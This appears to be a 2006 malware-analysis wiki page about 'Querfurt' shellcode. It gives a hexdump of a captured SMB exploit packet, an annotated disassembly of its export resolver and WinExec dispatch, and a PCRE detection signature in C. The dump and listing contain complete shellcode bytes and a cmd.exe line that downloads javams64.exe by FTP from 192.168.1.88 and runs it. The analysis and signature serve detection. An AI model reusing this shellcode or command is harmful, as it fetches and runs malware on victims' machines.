Querfurt Shellcode

Shellcode

raw

hexdump (NetBIOS-framed SMB as captured on the wire: a Negotiate Protocol request (command 0x72, dialect list ending in "NT LM 0.12"), then a Session Setup AndX request (command 0x73) whose SPNEGO security blob (OID 1.3.6.1.5.5.2) carries the padding runs, the shellcode and the command string)

00000000  00 00 00 85 ff 53 4d 42  72 00 00 00 00 18 53 c8  |....ÿSMBr.....SÈ|
00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 37 13  |..............7.|
00000020  00 00 00 00 00 62 00 02  50 43 20 4e 45 54 57 4f  |.....b..PC NETWO|
00000030  52 4b 20 50 52 4f 47 52  41 4d 20 31 2e 30 00 02  |RK PROGRAM 1.0..|
00000040  4c 41 4e 4d 41 4e 31 2e  30 00 02 57 69 6e 64 6f  |LANMAN1.0..Windo|
00000050  77 73 20 66 6f 72 20 57  6f 72 6b 67 72 6f 75 70  |ws for Workgroup|
00000060  73 20 33 2e 31 61 00 02  4c 4d 31 2e 32 58 30 30  |s 3.1a..LM1.2X00|
00000070  32 00 02 4c 41 4e 4d 41  4e 32 2e 31 00 02 4e 54  |2..LANMAN2.1..NT|
00000080  20 4c 4d 20 30 2e 31 32  00 00 00 10 bf ff 53 4d  | LM 0.12....¿ÿSM|
00000090  42 73 00 00 00 00 18 07  c8 00 00 00 00 00 00 00  |Bs......È.......|
000000a0  00 00 00 00 00 00 00 37  13 00 00 00 00 0c ff 00  |.......7......ÿ.|
000000b0  00 00 04 11 0a 00 00 00  00 00 00 00 7e 10 00 00  |............~...|
000000c0  00 00 d4 00 00 80 7e 10  60 82 10 7a 06 06 2b 06  |..Ô...~.`..z..+.|
000000d0  01 05 05 02 a0 82 10 6e  30 82 10 6a a1 82 10 66  |.... ..n0..j¡..f|
000000e0  23 82 10 62 03 82 04 01  00 41 41 41 41 41 41 41  |#..b.....AAAAAAA|
000000f0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
*
000004e0  41 41 41 41 41 41 41 41  41 03 00 23 82 0c 57 03  |AAAAAAAAA..#..W.|
000004f0  82 04 0a 00 90 42 90 42  90 42 90 42 81 c4 54 f2  |.....B.B.B.B.ÄTò|
00000500  ff ff fc e8 46 00 00 00  8b 45 3c 8b 7c 05 78 01  |ÿÿüèF....E<.|.x.|
00000510  ef 8b 4f 18 8b 5f 20 01  eb e3 2e 49 8b 34 8b 01  |ï.O.._ .ëã.I.4..|
00000520  ee 31 c0 99 ac 84 c0 74  07 c1 ca 0d 01 c2 eb f4  |î1À.¬.Àt.ÁÊ..Âëô|
00000530  3b 54 24 04 75 e3 8b 5f  24 01 eb 66 8b 0c 4b 8b  |;T$.uã._$.ëf..K.|
00000540  5f 1c 01 eb 8b 1c 8b 01  eb 89 5c 24 04 c3 31 c0  |_..ë....ë.\$.Ã1À|
00000550  64 8b 40 30 85 c0 78 0f  8b 40 0c 8b 70 1c ad 8b  |d.@0.Àx..@..p.­.|
00000560  68 08 e9 0b 00 00 00 8b  40 34 05 7c 00 00 00 8b  |h.é.....@4.|....|
00000570  68 3c 5f 31 f6 60 56 eb  0d 68 ef ce e0 60 68 98  |h<_1ö`Vë.hïÎà`h.|
00000580  fe 8a 0e 57 ff e7 e8 ee  ff ff ff 65 63 68 6f 20  |þ..Wÿçèîÿÿÿecho |
00000590  6f 70 65 6e 20 31 39 32  2e 31 36 38 2e 31 2e 38  |open 192.168.1.8|
000005a0  38 20 36 31 37 35 31 20  3e 20 6f 26 65 63 68 6f  |8 61751 > o&echo|
000005b0  20 75 73 65 72 20 31 20  31 20 3e 3e 20 6f 20 26  | user 1 1 >> o &|
000005c0  65 63 68 6f 20 67 65 74  20 6a 61 76 61 6d 73 36  |echo get javams6|
000005d0  34 2e 65 78 65 20 3e 3e  20 6f 20 26 65 63 68 6f  |4.exe >> o &echo|
000005e0  20 71 75 69 74 20 3e 3e  20 6f 20 26 66 74 70 20  | quit >> o &ftp |
000005f0  2d 6e 20 2d 73 3a 6f 20  26 64 65 6c 20 2f 46 20  |-n -s:o &del /F |
00000600  2f 51 20 6f 20 26 6a 61  76 61 6d 73 36 34 2e 65  |/Q o &javams64.e|
00000610  78 65 0d 0a 00 42 42 42  42 42 42 42 42 42 42 42  |xe...BBBBBBBBBBB|
00000620  42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42  |BBBBBBBBBBBBBBBB|
*
000008f0  42 42 42 42 42 42 42 42  42 42 42 42 42 23 0a 03  |BBBBBBBBBBBBB#..|
00000900  08 00 f8 0f 01 00 f8 0f  01 23 82 08 39 03 82 04  |..ø...ø..#..9...|
00000910  11 00 43 43 43 43 20 f0  fd 7f 53 56 57 66 81 ec  |..CCCC ðý.SVWf.ì|
00000920  80 00 89 e6 e8 ed 00 00  00 ff 36 68 09 12 d6 63  |...æèí...ÿ6h..Öc|
00000930  e8 f7 00 00 00 89 46 08  e8 a2 00 00 00 ff 76 04  |è÷....F.è¢...ÿv.|
00000940  68 6b d0 2b ca e8 e2 00  00 00 89 46 0c e8 3f 00  |hkÐ+Êèâ....F.è?.|
00000950  00 00 ff 76 04 68 fa 97  02 4c e8 cd 00 00 00 31  |..ÿv.hú..LèÍ...1|
00000960  db 68 10 04 00 00 53 ff  d0 89 c3 56 8b 76 10 89  |Ûh....SÿÐ.ÃV.v..|
00000970  c7 b9 10 04 00 00 f3 a4  5e 31 c0 50 50 50 53 50  |ǹ....ó€^1ÀPPPSP|
00000980  50 ff 56 0c 8b 46 08 66  81 c4 80 00 5f 5e 5b ff  |PÿV..F.f.Ä.._^[ÿ|
00000990  e0 60 e8 23 00 00 00 8b  44 24 0c 8d 58 7c 83 43  |à`è#....D$..X|.C|
000009a0  3c 05 81 43 28 00 10 00  00 81 63 28 00 f0 ff ff  |<..C(.....c(.ðÿÿ|
000009b0  8b 04 24 83 c4 14 50 31  c0 c3 31 d2 64 ff 32 64  |..$.Ä.P1ÀÃ1Òdÿ2d|
000009c0  89 22 31 db b8 90 42 90  42 31 c9 b1 02 89 df f3  |."1Ûž.B.B1ɱ..ßó|
000009d0  af 74 03 43 eb f3 89 7e  10 64 8f 02 58 61 c3 60  |¯t.Cëó.~.d..XaÃ`|
000009e0  bf 20 f0 fd 7f 8b 1f 8b  46 08 89 07 8b 7f f8 81  |¿ ðý....F.....ø.|
000009f0  c7 78 01 00 00 89 f9 39  19 74 04 8b 09 eb f8 89  |Çx....ù9.t...ëø.|
00000a00  fa 39 5a 04 74 05 8b 52  04 eb f6 89 11 89 4a 04  |ú9Z.t..R.ëö...J.|
00000a10  c6 43 fd 01 61 c3 a1 0c  f0 fd 7f 8b 40 1c 8b 58  |ÆCý.aá.ðý..@..X|
00000a20  08 89 1e 8b 00 8b 40 08  89 46 04 c3 60 8b 6c 24  |......@..F.Ã`.l$|
00000a30  28 8b 45 3c 8b 54 05 78  01 ea 8b 4a 18 8b 5a 20  |(.E<.T.x.ê.J..Z |
00000a40  01 eb e3 38 49 8b 34 8b  01 ee 31 ff 31 c0 fc ac  |.ëã8I.4..î1ÿ1Àü¬|
00000a50  38 e0 74 07 c1 cf 0d 01  c7 eb f4 3b 7c 24 24 75  |8àt.ÁÏ..Çëô;|$$u|
00000a60  e1 8b 5a 24 01 eb 66 8b  0c 4b 8b 5a 1c 01 eb 8b  |á.Z$.ëf..K.Z..ë.|
00000a70  04 8b 01 e8 89 44 24 1c  61 c2 08 00 eb fe 43 43  |...è.D$.aÂ..ëþCC|
00000a80  43 43 43 43 43 43 43 43  43 43 43 43 43 43 43 43  |CCCCCCCCCCCCCCCC|
*
00000d20  43 43 23 82 04 20 03 09  00 eb 06 90 90 90 90 90  |CC#.. ...ë......|
00000d30  90 03 82 04 11 00 44 44  44 44 44 44 44 44 44 44  |......DDDDDDDDDD|
00000d40  44 44 44 44 44 44 44 44  44 44 44 44 44 44 44 44  |DDDDDDDDDDDDDDDD|
*
00001140  44 44 44 44 44 44 00 00  00 00 00 00              |DDDDDD......|
0000114c

Analysis (IDA listing of the first-stage code at offset 0x503 of the dump; the bytes from about 0x914 onward look like a second, larger code stage and are not covered by this listing)

                 ; --- Entry (0x503) --------------------------------------------------
                 ; The only purpose of this call is to push 0x508, the address of the
                 ; resolver below, so that loc_54E can `pop edi` it and the dispatch
                 ; code can later come back here with `jmp edi`.
00000503                 call    loc_54E
                 ; --- Export resolver (0x508-0x54D) ----------------------------------
                 ; In:  ebp     = base of the module to search (kernel32, set by loc_54E)
                 ;      [esp]   = address that the final `retn` jumps to
                 ;      [esp+4] = ROR-13 hash of the export name wanted
                 ; Out: [esp+4] = VA of that export; `retn` then consumes [esp]
                 ; Clobbers eax, ebx, ecx, edx, esi, edi, flags.
                 ; Walks IMAGE_EXPORT_DIRECTORY by name; ordinal-only and forwarded
                 ; exports are not handled.
00000508                 mov     eax, [ebp+3Ch]  ; e_lfanew: offset of the PE header
0000050B                 mov     edi, [ebp+eax+78h] ; DataDirectory[0].VirtualAddress = export directory RVA (PE32 layout)
0000050F                 add     edi, ebp        ; edi = IMAGE_EXPORT_DIRECTORY (VA)
00000511                 mov     ecx, [edi+18h]  ; ecx = NumberOfNames; loop counter, names are tried last-to-first
00000514                 mov     ebx, [edi+20h]  ; ebx = AddressOfNames RVA
00000517                 add     ebx, ebp        ; ebx = name-pointer table (VA)
00000519
00000519 loc_519:
                 ; NOTE(review): there is no miss path. Once every name has been
                 ; tried ecx is 0 and jecxz lands on loc_549 with ebx still holding
                 ; the name-table VA, which is then stored as the "function address"
                 ; and returned into. A hash that matches nothing therefore crashes
                 ; or executes the name table instead of failing cleanly.
00000519                 jecxz   short loc_549
0000051B                 dec     ecx             ; ecx = index of the name under test
0000051C                 mov     esi, [ebx+ecx*4] ; RVA of the name string
0000051F                 add     esi, ebp        ; esi = name string (VA)
00000521                 xor     eax, eax        ; eax = 0 so that `add edx, eax` below adds only al
00000523                 cdq                     ; edx = 0 (sign-extension of eax): hash accumulator
00000524
00000524 loc_524:                                ; Calculate Hash of Function Name
                 ; h = ror(h, 13) + byte for every byte up to, not including, the NUL.
                 ; This is the hash the constants pushed at 0x579/0x57E were made with.
00000524                 lodsb                   ; al = next byte of the name, esi++
00000525                 test    al, al
00000527                 jz      short loc_530   ; NUL terminator reached: hash complete in edx
00000529                 ror     edx, 0Dh
0000052C                 add     edx, eax
0000052E                 jmp     short loc_524   ; Calculate Hash of Function Name
00000530 ; ---------------------------------------------------------------------------
00000530
00000530 loc_530:
00000530                 cmp     edx, [esp+4]    ; wanted hash sits just above the return address
00000534                 jnz     short loc_519   ; no match: try the previous name
00000536                 mov     ebx, [edi+24h]  ; ebx = AddressOfNameOrdinals RVA
00000539                 add     ebx, ebp
0000053B                 mov     cx, [ebx+ecx*2] ; cx = ordinal for this name (16-bit write: the upper half of ecx keeps the index's upper half, 0 unless NumberOfNames > 0FFFFh)
0000053F                 mov     ebx, [edi+1Ch]  ; ebx = AddressOfFunctions RVA
00000542                 add     ebx, ebp
00000544                 mov     ebx, [ebx+ecx*4] ; ebx = RVA of the export
00000547                 add     ebx, ebp        ; ebx = VA of the export (no check for a forwarder RVA)
00000549
00000549 loc_549:
00000549                 mov     [esp+4], ebx    ; overwrite the hash slot with the resolved address
0000054D                 retn                    ; pops [esp] and jumps to it.
0000054D                                         ; Pass 1: [esp] = 0x508 (pushed by `push edi` at 0x583), so
0000054D                                         ; the resolver runs again with the ExitThread hash, which
0000054D                                         ; the pass-1 retn has exposed at [esp+4].
0000054D                                         ; Pass 2: [esp] = resolved WinExec, so this retn *calls*
0000054D                                         ; WinExec with [esp] = ExitThread (its return address),
0000054D                                         ; [esp+4] = address of the command string (pushed by the
0000054D                                         ; call at 0x586) and [esp+8] = 0 (uCmdShow, pushed at 0x576).
0000054D                                         ; When WinExec returns it lands in ExitThread, so the thread
0000054D                                         ; ends after the command has been started.
0000054E ; ---------------------------------------------------------------------------
0000054E
0000054E loc_54E:
                 ; --- Find the kernel32 image base (0x54E-0x571) ----------------------
                 ; Reached via `call` from 0x503, so [esp] = 0x508 on entry (consumed
                 ; by loc_572's `pop edi`).
                 ; Out: ebp = kernel32 base, the module the resolver searches.
0000054E                 xor     eax, eax
00000550                 mov     eax, fs:[eax+30h] ; NT: fs:[30h] = TEB.ProcessEnvironmentBlock (PEB)
00000554                 test    eax, eax
00000556                 js      short loc_567   ; high bit set: not a user-mode PEB pointer, take the non-NT path
00000558                 mov     eax, [eax+0Ch]  ; PEB.Ldr (PEB_LDR_DATA)
0000055B                 mov     esi, [eax+1Ch]  ; Ldr.InInitializationOrderModuleList.Flink: first entry (ntdll)
0000055E                 lodsd                   ; eax = Flink of that entry -> second entry of the init-order list
0000055F                 mov     ebp, [eax+8]    ; DllBase of that entry (InInitializationOrderLinks is at +10h, DllBase at +18h)
                                                 ; NOTE(review): the second init-order module is kernel32.dll on
                                                 ; NT4/2000/XP/2003 only; on Windows 7 and later that slot is
                                                 ; reported to be KernelBase.dll, so this lookup would not yield
                                                 ; kernel32 there (expected for a 2006 sample, worth knowing when
                                                 ; replaying it on a newer host).
00000562                 jmp     loc_572         ; ebp = Base of kernel32
00000567 ; ---------------------------------------------------------------------------
00000567
00000567 loc_567:
                 ; Non-NT fallback (presumably Win9x/Me, where fs:[30h] does not point
                 ; at a PEB): follows hard-coded offsets to a kernel32 base pointer.
                 ; The structure layout cannot be verified from this listing, treat the
                 ; offsets as opaque.
00000567                 mov     eax, [eax+34h]
0000056A                 add     eax, 7Ch ; '|'
0000056F                 mov     ebp, [eax+3Ch]
00000572
00000572 loc_572:                                ; ebp = Base of kernel32
                 ; --- Dispatch (0x572-0x58A) ------------------------------------------
                 ; Builds, purely with pushes, the frame the resolver/retn chain at
                 ; 0x508 needs, then jumps into the resolver. Stack when the resolver
                 ; is entered, top first:
                 ;   0x508            fake return address -> resolver runs a second time
                 ;   hash(WinExec)    resolved on pass 1
                 ;   hash(ExitThread) resolved on pass 2
                 ;   0x58B            address of the command string -> WinExec lpCmdLine
                 ;   0                -> WinExec uCmdShow (SW_HIDE)
                 ;   pusha registers
00000572                 pop     edi             ; edi = 0x508, the return address pushed by the call at 0x503 = resolver entry
00000573                 xor     esi, esi
00000575                 pusha                   ; saved registers become the last thing on the stack
00000576                 push    esi             ; 0 = uCmdShow for WinExec
00000577                 jmp     short loc_586
00000579 ; ---------------------------------------------------------------------------
00000579
00000579 loc_579:                                ; Hash of ExitThread
                 ; Entered through the call at 0x586, which has just pushed 0x58B,
                 ; the address of the command string that follows it.
00000579                 push    60E0CEEFh       ; ROR-13 hash of "ExitThread" (resolved second)
0000057E                 push    0E8AFE98h       ; Hash of WinExec (resolved first: it is nearest the top)
00000583                 push    edi             ; fake return address so the resolver re-enters itself after pass 1
00000584                 jmp     edi             ; -> 0x508 with [esp+4] = WinExec hash
00000586 ; ---------------------------------------------------------------------------
00000586
00000586 loc_586:
00000586                 call    loc_579         ; pushes 0x58B (the string below) as the WinExec argument; never returns here
00000586 ; ---------------------------------------------------------------------------
                 ; Command line handed to WinExec: one cmd.exe line of &-separated steps.
                 ;   1. echo ... > o / >> o   writes an ftp script "o": open 192.168.1.88
                 ;                            on port 61751, log in as user "1" with
                 ;                            password "1", get javams64.exe, quit
                 ;   2. ftp -n -s:o           runs the script non-interactively
                 ;   3. del /F /Q o           removes the script
                 ;   4. javams64.exe          runs whatever was downloaded
                 ; 192.168.1.88 is an RFC 1918 address, so this sample was aimed at a
                 ; host on the same private network (lab or LAN capture). The download
                 ; uses a non-standard port, so a filter on TCP/21 alone would not see it.
                 ; The string is CRLF + NUL terminated; the NUL is what the PCRE
                 ; capture below stops on.
0000058B aEchoOpen192_16 db 'echo open 192.168.1.88 61751 > o&echo user 1 1 >> o &echo ge'
0000058B                 db 't javams64.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q '
0000058B                 db 'o &javams64.exe',0Dh,0Ah,0

shellcode patterns

winexec (signature for the resolver and the WinExec/ExitThread dispatch listed above; the C constant is named createprocesspcre although the shellcode calls WinExec, not CreateProcess)

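/*
 * PCRE signature for the Querfurt first stage.
 *
 * The fixed part is the code at dump offsets 0x503-0x58A taken verbatim:
 * the export resolver, the PEB walk, the two hash pushes and the final
 * `call` that pushes the address of the command string. The capture group
 * then grabs the NUL-terminated command line that WinExec() receives.
 *
 * Naming: the shellcode calls WinExec, not CreateProcess. The identifier is
 * kept so existing callers still link.
 *
 * Capture fix: the original group was `(.*\x00)`. The command string ends in
 * "\r\n\0" and PCRE's `.` does not match LF unless the pattern is compiled
 * with PCRE_DOTALL, so without that flag the whole pattern failed to match
 * the very sample it was written for; with the flag the greedy `.*` ran on
 * to the LAST NUL in the buffer and captured far more than the command.
 * `[^\x00]*` matches every byte (newlines included) up to the first NUL
 * regardless of compile flags, which is exactly the string WinExec sees.
 *
 * Escaping: the C literal holds "\xE8" as four characters (backslash, x, E,
 * 8) so that PCRE, not the C compiler, interprets the hex escapes.
 */
const char *createprocesspcre = 
"\\xE8\\x46\\x00\\x00\\x00\\x8B\\x45\\x3C\\x8B\\x7C\\x05\\x78\\x01\\xEF\\x8B\\x4F"
"\\x18\\x8B\\x5F\\x20\\x01\\xEB\\xE3\\x2E\\x49\\x8B\\x34\\x8B\\x01\\xEE\\x31\\xC0"
"\\x99\\xAC\\x84\\xC0\\x74\\x07\\xC1\\xCA\\x0D\\x01\\xC2\\xEB\\xF4\\x3B\\x54\\x24"
"\\x04\\x75\\xE3\\x8B\\x5F\\x24\\x01\\xEB\\x66\\x8B\\x0C\\x4B\\x8B\\x5F\\x1C\\x01"
"\\xEB\\x8B\\x1C\\x8B\\x01\\xEB\\x89\\x5C\\x24\\x04\\xC3\\x31\\xC0\\x64\\x8B\\x40"
"\\x30\\x85\\xC0\\x78\\x0F\\x8B\\x40\\x0C\\x8B\\x70\\x1C\\xAD\\x8B\\x68\\x08\\xE9"
"\\x0B\\x00\\x00\\x00\\x8B\\x40\\x34\\x05\\x7C\\x00\\x00\\x00\\x8B\\x68\\x3C\\x5F"
"\\x31\\xF6\\x60\\x56\\xEB\\x0D\\x68\\xEF\\xCE\\xE0\\x60\\x68\\x98\\xFE\\x8A\\x0E"
"\\x57\\xFF\\xE7\\xE8\\xEE\\xFF\\xFF\\xFF([^\\x00]*\\x00)";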
 
csni/shellcodes/querfurt.txt · Last modified: 2006/02/17 14:01
 